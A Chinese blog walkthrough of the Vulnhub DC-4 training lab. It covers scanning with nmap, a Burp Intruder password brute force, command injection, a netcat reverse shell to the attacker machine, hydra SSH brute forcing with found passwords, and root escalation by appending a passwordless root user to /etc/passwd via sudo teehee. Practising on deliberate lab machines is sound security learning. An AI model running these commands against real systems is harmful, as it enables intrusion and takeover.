看完这篇 教你玩转渗透测试靶机vulnhub——DC4

简介: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

Vulnhub靶机DC4渗透测试详解

Vulnhub靶机介绍:

Vulnhub靶机下载:

Vulnhub靶机安装:

Vulnhub靶机漏洞详解:

①:信息收集:

②:暴力破解:

③:提权:

Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。


从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。


Vulnhub靶机下载:

官网地址:http://www.five86.com/downloads/DC-4.zip


Vulnhub靶机安装:

下载好了把安装包解压 然后试用VMware即可。




Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机


渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.30


使用命令:nmap -sS -sV -A -n 172.16.5.30



开启了80和22端口,我们直接访问80端口 dirb 扫了一下没啥 可能就是暴力破解!!



②:暴力破解:

使用一个工具burp设置代理 然后抓个包 输入账号admin密码123456 发送到Intruder模块 设置一个字典 然后 线程设置2000 start attack




这里我们知道知道了密码:happy 成功登入!!



这里应该是个命令执行漏洞,pyload:radio=cat+/etc/passwd&submit=Run 查看用户,发现有三个普通用户:charles、jim、sam



nc -e /bin/bash/ 172.16.5.42 4444

1


使用nc -lvp 4444命令进行反弹,反弹成功 设置python交互 python3 -c "import pty;pty.spawn('/bin/bash')"


信息收集一下 uname -a 进入/home/ 进入/jim/cat test.sh


在backups 中发现了old-passwords.bak


把这个old-passwords.bak里面的复制到kali中然后新建一个字典jim.txt 吧


使用命令:hydra -l jim -P /root/桌面/jim.txt ssh://172.16.5.30



获得密码为:jibril04 登入ssh


登入提示:You have mail 让我们看邮寄 cd/var/mail 发现了jim里面有个Charles密码:^xHhA&hvim0y 尝试切换登入



提示我们使用teehee提权:sudo teehee --help



③:提权:

root权限免密码使用teehee ,teehee 是啥???太菜了不会 ,,,,,,学了半天


大概就是当发现有最追加写入文件功能的时候,直接往 /etc/passwd 里加个root用户


passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]


echo "axb::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

1


至此获取到了flag,渗透测试结束。


Vulnhub靶机渗透总结:

这是做的第五个靶场了,学习的知识点和一些细节就是 :

1.需要注意的细节就是bp抓包的时候不要发送到repeater,那个send和Forward不一样 这里卡了很久一直报错,然后没有回弹shell。


2.需要注意的还是python交互那个 容易打错,一定要细心在细心,我前面加了个python3就好

3.把这个old-passwords.bak里面的复制到kali这样才方便爆破 好像下载不了只能复制(我比较菜就只能这样做了)

4.还有个小失误就是 jim里面有个charles用户 我ssh登入的时候 写的是大写的登了半天没进去(气死我了,还是要多细心呀!!)

5.想感慨一下,因为是第一次做 每次都会发现新问题然后去解决 对自己也挺好的 收获也挺多的 多去尝试就好啦!加油!!


新知识点:

①:学习了hydra (九头蛇)工具的使用

②学习了teehee 提权

最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!


相关文章
|
1月前
|
安全
DC电源模块的安全性能评估与测试方法
DC电源模块的安全性能评估与测试方法 DC电源模块的安全性能评估与测试方法应包括以下几个方面: 1. 输入安全性测试:包括输入电压范围、输入电压稳定性、输入电流范围、输入电流保护等方面的测试。测试方法可以是逐步增加输入电压或输入电流,观察模块的工作状态和保护功能。
DC电源模块的安全性能评估与测试方法
|
1月前
|
安全 测试技术
BOSHIDA DC电源模块的安全性能评估与测试方法
BOSHIDA DC电源模块的安全性能评估与测试方法
 BOSHIDA DC电源模块的安全性能评估与测试方法
|
1月前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
56 0
|
1月前
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
|
1月前
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA  AC/DC电源模块的可靠性设计与测试方法
|
1月前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
21 0
|
1月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
28 0
|
1月前
|
Shell Linux 网络安全
基于Vulnhub—DC8靶场渗透测试过程
这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码
26 0
|
1月前
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
83 0
|
14天前
|
机器学习/深度学习 人工智能 自然语言处理
深入探索软件测试:策略、工具与未来趋势
【5月更文挑战第38天】 在软件开发的生命周期中,测试环节扮演着至关重要的角色。随着技术的不断进步和市场需求的多样化,传统的测试方法已逐渐不能满足现代软件项目的需求。本文旨在提供一个全面的软件测试概述,包括最新的测试策略、常用工具以及预测未来的发展趋势。通过分析自动化测试的效益、持续集成的重要性以及人工智能在测试中的应用,文章将帮助读者构建一个更高效、更智能的软件测试环境。